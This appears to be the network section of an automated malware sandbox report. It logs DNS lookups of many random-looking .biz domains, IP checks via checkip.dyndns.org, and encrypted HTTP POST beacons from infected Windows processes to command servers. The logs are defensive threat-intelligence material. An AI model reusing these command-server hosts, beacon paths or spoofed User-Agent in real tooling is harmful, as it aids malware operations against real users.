                                                                                                                                                Dec 2, 2024 07:56:15.702336073 CET5910153192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:16.190598011 CET53591011.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.558034897 CET6233453192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:17.867614985 CET53623341.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:19.401046038 CET5751253192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:19.713557005 CET53575121.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:21.110518932 CET6367553192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:21.579165936 CET53636751.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.334588051 CET6067353192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:22.578025103 CET53606731.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.737514019 CET5828853192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:24.211787939 CET53582881.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:24.760245085 CET5744153192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:24.898817062 CET53574411.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:26.018021107 CET5050553192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:26.235097885 CET53505051.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:26.236257076 CET5262953192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:26.811805010 CET53526291.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.108714104 CET5874253192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:29.340841055 CET53587421.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.343161106 CET5494753192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:29.563549995 CET53549471.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.569993973 CET6375453192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:30.346731901 CET53637541.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:14.837835073 CET5898553192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:57:15.831046104 CET53589851.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:52.305469036 CET5069953192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:57:52.871114016 CET53506991.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.106687069 CET5391453192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:57:55.677498102 CET53539141.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:57.927577972 CET5243253192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:57:58.498339891 CET53524321.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:59.743882895 CET5806853192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:58:00.513247967 CET53580681.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:02.747684956 CET6309153192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:58:03.348413944 CET53630911.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:04.606127024 CET5207353192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:58:04.922905922 CET53520731.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:06.265722990 CET5849653192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:58:06.764365911 CET53584961.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 2, 2024 07:56:06.732753992 CET192.168.2.41.1.1.10x2509Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:08.134897947 CET192.168.2.41.1.1.10x3e9eStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:08.291016102 CET192.168.2.41.1.1.10xe2c8Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.709887028 CET192.168.2.41.1.1.10xe9b1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.947454929 CET192.168.2.41.1.1.10xef9aStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:12.954268932 CET192.168.2.41.1.1.10xf6adStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:15.278362989 CET192.168.2.41.1.1.10x74b5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:15.702336073 CET192.168.2.41.1.1.10x2795Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:17.558034897 CET192.168.2.41.1.1.10x6d7dStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:19.401046038 CET192.168.2.41.1.1.10x20f9Standard query (0)ww99.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:21.110518932 CET192.168.2.41.1.1.10x63d1Standard query (0)ww7.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:22.334588051 CET192.168.2.41.1.1.10x5cebStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:23.737514019 CET192.168.2.41.1.1.10xdd50Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:24.760245085 CET192.168.2.41.1.1.10x2cfdStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:26.018021107 CET192.168.2.41.1.1.10xee54Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:26.236257076 CET192.168.2.41.1.1.10xdbbcStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.108714104 CET192.168.2.41.1.1.10x41c5Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.343161106 CET192.168.2.41.1.1.10x2917Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.569993973 CET192.168.2.41.1.1.10xe321Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:14.837835073 CET192.168.2.41.1.1.10x3962Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:52.305469036 CET192.168.2.41.1.1.10xbdf6Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:55.106687069 CET192.168.2.41.1.1.10xb81cStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:57.927577972 CET192.168.2.41.1.1.10x925fStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:59.743882895 CET192.168.2.41.1.1.10x90f7Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:02.747684956 CET192.168.2.41.1.1.10x33f3Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:04.606127024 CET192.168.2.41.1.1.10x6095Standard query (0)ww99.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:06.265722990 CET192.168.2.41.1.1.10x307aStandard query (0)ww7.fwiwk.bizA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 2, 2024 07:56:07.033504963 CET1.1.1.1192.168.2.40x2509No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:08.274491072 CET1.1.1.1192.168.2.40x3e9eNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:08.428193092 CET1.1.1.1192.168.2.40xe2c8No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET1.1.1.1192.168.2.40xe9b1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:10.518688917 CET1.1.1.1192.168.2.40xef9aNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:13.440334082 CET1.1.1.1192.168.2.40xf6adNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:15.611633062 CET1.1.1.1192.168.2.40x74b5No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:15.611633062 CET1.1.1.1192.168.2.40x74b5No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:16.190598011 CET1.1.1.1192.168.2.40x2795No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:17.867614985 CET1.1.1.1192.168.2.40x6d7dNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:17.867614985 CET1.1.1.1192.168.2.40x6d7dNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:19.713557005 CET1.1.1.1192.168.2.40x20f9No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:21.579165936 CET1.1.1.1192.168.2.40x63d1No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:21.579165936 CET1.1.1.1192.168.2.40x63d1No error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:22.578025103 CET1.1.1.1192.168.2.40x5cebNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:24.211787939 CET1.1.1.1192.168.2.40xdd50No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:24.211787939 CET1.1.1.1192.168.2.40xdd50No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:24.211787939 CET1.1.1.1192.168.2.40xdd50No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:24.898817062 CET1.1.1.1192.168.2.40x2cfdNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:26.235097885 CET1.1.1.1192.168.2.40xee54Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:26.811805010 CET1.1.1.1192.168.2.40xdbbcNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.340841055 CET1.1.1.1192.168.2.40x41c5Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.563549995 CET1.1.1.1192.168.2.40x2917Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:30.346731901 CET1.1.1.1192.168.2.40xe321No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:15.831046104 CET1.1.1.1192.168.2.40x3962No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:52.871114016 CET1.1.1.1192.168.2.40xbdf6No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:55.677498102 CET1.1.1.1192.168.2.40xb81cNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:58.498339891 CET1.1.1.1192.168.2.40x925fNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:00.513247967 CET1.1.1.1192.168.2.40x90f7No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:03.348413944 CET1.1.1.1192.168.2.40x33f3No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:03.348413944 CET1.1.1.1192.168.2.40x33f3No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:04.922905922 CET1.1.1.1192.168.2.40x6095No error (0)ww99.fwiwk.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:06.764365911 CET1.1.1.1192.168.2.40x307aNo error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:06.764365911 CET1.1.1.1192.168.2.40x307aNo error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • reallyfreegeoip.org
                                                                                                                                                • pywolwnvd.biz
                                                                                                                                                • checkip.dyndns.org
                                                                                                                                                • ssbzmoy.biz
                                                                                                                                                • cvgrf.biz
                                                                                                                                                • npukfztj.biz
                                                                                                                                                • przvgke.biz
                                                                                                                                                • ww99.przvgke.biz
                                                                                                                                                • ww7.przvgke.biz
                                                                                                                                                • ww12.przvgke.biz
                                                                                                                                                • knjghuig.biz
                                                                                                                                                • lpuegx.biz
                                                                                                                                                • vjaxhpbji.biz
                                                                                                                                                • xlfhhhm.biz
                                                                                                                                                • ifsaia.biz
                                                                                                                                                • saytjshyf.biz
                                                                                                                                                • vcddkls.biz
                                                                                                                                                • fwiwk.biz
                                                                                                                                                • ww99.fwiwk.biz

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.44973154.244.188.177807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:08.478467941 CET347OUTPOST /lf HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:08.478467941 CET778OUTData Raw: 05 3b 8a bc f4 54 ce 81 fe 02 00 00 ac 34 ba a4 96 de ad 57 5c 97 58 19 c7 08 6c a1 8f 55 11 85 f6 1c 8a b1 1c d1 8f 31 c4 44 e6 5f 47 f0 34 2b 99 7f c1 8f 87 0f de 35 5a ba 65 32 31 f7 6b 00 cb 1b 04 a7 19 4d 13 b2 d6 1c 84 04 5a a3 31 8c da be
                                                                                                                                                Data Ascii: ;T4W\XlU1D_G4+5Ze21kMZ1+#$2$b;^KUftf"J x(@-_x4yDV4XF4k6=pJx5,pw\HDIO:.U=Kw)B%uoW;3ls9 .N
                                                                                                                                                Dec 2, 2024 07:56:09.906385899 CET413INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:09 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=e60876eed7e2d97292ec7b74f8bbb8c4|8.46.123.228|1733122569|1733122569|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.44973254.244.188.177807436C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:08.670545101 CET348OUTPOST /aah HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: pywolwnvd.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 844
                                                                                                                                                Dec 2, 2024 07:56:08.670588970 CET844OUTData Raw: d0 28 c8 26 c0 86 68 50 40 03 00 00 ac 3a 22 df 7d bd f6 b3 8b ea 16 b4 4f 89 50 e0 e7 40 bd 6a fe da 55 1f 36 02 b2 b2 6c 6e 01 3e 1e bd 93 2f 85 f4 fe c4 2a fe ad aa c2 2d 47 a4 16 1b 7e 6e e8 db bf 3c f4 91 cf cd e4 f9 4a 56 9b eb 89 f2 8e 0e
                                                                                                                                                Data Ascii: (&hP@:"}OP@jU6ln>/*-G~n<JVB=$)?o8W.~arvUsjN%4}WM?;Hm=Q1l|Gk~%T|vGL12Df.8kQnF;1VC@


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449733193.122.130.0807496C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:09.989016056 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 2, 2024 07:56:12.898097038 CET321INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: dacb6d961c26351b574b152a90591817
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                Dec 2, 2024 07:56:12.903351068 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Dec 2, 2024 07:56:12.999541044 CET321INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: dacb6d961c26351b574b152a90591817
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                                                                                Dec 2, 2024 07:56:15.276699066 CET321INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:15 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 104
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: e5c4bbe1e34a03cf40805e195b63c9da
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.44973418.141.10.107807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:10.680054903 CET344OUTPOST /r HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: ssbzmoy.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:10.680156946 CET778OUTData Raw: 35 d6 f4 89 33 6a d4 56 fe 02 00 00 08 3d 4d 88 83 79 07 25 a8 a6 19 cf 85 c2 3e 33 ac bb 0d 9e 7e 0d a9 37 16 73 10 bf 18 0c aa 49 28 c2 ad db 22 68 34 20 7b a4 13 57 e9 80 a2 ea 67 09 32 1b e3 1a 50 3c db 28 74 f1 0c 48 e9 3e 8e 8b a1 6f 49 07
                                                                                                                                                Data Ascii: 53jV=My%>3~7sI("h4 {Wg2P<(tH>oI RB,Kv!Hp0X6QB6$ONvQWup7V"m]i4dR7(G f,PA&eE(>~^].bP4e8>`\NT2=l
                                                                                                                                                Dec 2, 2024 07:56:12.898211002 CET411INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:12 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=f5b364b892e5fbfac0a04485d7c34695|8.46.123.228|1733122572|1733122572|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.44973554.244.188.177807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:14.231604099 CET355OUTPOST /hluumowlkjhsxe HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: cvgrf.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:14.231604099 CET778OUTData Raw: 8b ad 46 f0 3d 68 e6 e1 fe 02 00 00 87 a3 5f 25 c5 fe 0a 87 f0 16 e3 a1 5f bd 27 bf 49 cf 48 1c aa d7 bb 83 33 02 59 36 1d 91 74 c5 3d af fa 42 9c 94 4d d0 6f 2f 3d 67 2f 06 47 50 86 40 10 56 82 bd 8c 88 89 f2 99 84 97 d5 ed cb 68 ac 14 8b 5b 4e
                                                                                                                                                Data Ascii: F=h_%_'IH3Y6t=BMo/=g/GP@Vh[N%X018z3am^uShR3:NzHZhtGYbdUa4aR}y:7(YLR>p|1E\Li>
                                                                                                                                                Dec 2, 2024 07:56:15.640903950 CET409INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 02 Dec 2024 06:56:15 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: btst=72ae9c8f06aa4d3a4b76ae44839b161e|8.46.123.228|1733122575|1733122575|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.44973744.221.84.105807412C:\Windows\System32\alg.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 2, 2024 07:56:16.345405102 CET358OUTPOST /hwjtljgqnsqgbc HTTP/1.1
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                Content-Length: 778
                                                                                                                                                Dec 2, 2024 07:56:16.345429897 CET778OUTData Raw: f2 3f 38 1d b3 0f cd 90 fe 02 00 00 70 f8 0d a8 d8 46 60 1c 0f 57 02 ca 13 d5 c8 b3 2d ff e8 9b 27 00 16 4d dc d2 2b ce 05 13 d0 b8 66 78 09 cb de f8 17 ae 58 e3 b1 c4 79 2b fe 5c c9 14 bf e4 80 32 b8 4a dd 0b 04 59 71 50 36 bc bc f1 b6 20 5a 08
